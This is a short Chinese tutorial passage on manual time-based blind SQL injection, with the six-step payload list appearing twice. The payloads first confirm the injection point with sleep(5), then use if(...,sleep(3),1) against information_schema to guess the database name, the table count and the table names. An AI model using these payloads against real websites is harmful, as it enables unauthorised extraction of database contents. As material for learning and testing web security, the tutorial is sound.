2、手工猜解注入过程
1) 发现注入点
?id=1’ and sleep(5) --+
2) 猜解当前数据库名称的长度
?id=1' and if(length(database())=4,sleep(3),1)--+
3) 猜解当前数据库名称
?id=1' and if(substr(database(),{},1)='{}',sleep(3),1)--+
4) 猜解当前库中表的数量
?id=1' and if((select count(table_name) from information_schema.tables where table_schema=database())={},sleep(3),1)--+
5) 猜解当前库中每个表名的长度
?id=1' and if(length(substr((select table_name from information_schema.tables where table_schema=database() limit {},1),1))={},sleep(3),1)--+
6) 猜解表的名称
?id=1' and if(substr((select table_name from information_schema.tables where table_schema=database() limit {},1),{},1)='{}',sleep(3),1)--+
SQL注入 基于时间的sql盲注-手工 1、 使用场景 代入单双引号均不报错,并且界面也没有任何回显信息,我们只能通过页面回显的延时效果来判断,进行库名、表名、字段名和字段内容等字符的拆解。
2、手工猜解注入过程 1) 发现注入点 ?id=1’ and sleep(5) --+ 2) 猜解当前数据库名称的长度 ?id=1' and if(length(database())=4,sleep(3),1)--+ 3) 猜解当前数据库名称 ?id=1' and if(substr(database(),{},1)='{}',sleep(3),1)--+ 4) 猜解当前库中表的数量 ?id=1' and if((select count(table_name) from information_schema.tables where table_schema=database())={},sleep(3),1)--+ 5) 猜解当前库中每个表名的长度 ?id=1' and if(length(substr((select table_name from information_schema.tables where table_schema=database() limit {},1),1))={},sleep(3),1)--+ 6) 猜解表的名称 ?id=1' and if(substr((select table_name from information_schema.tables where table_schema=database() limit {},1),{},1)='{}',sleep(3),1)--+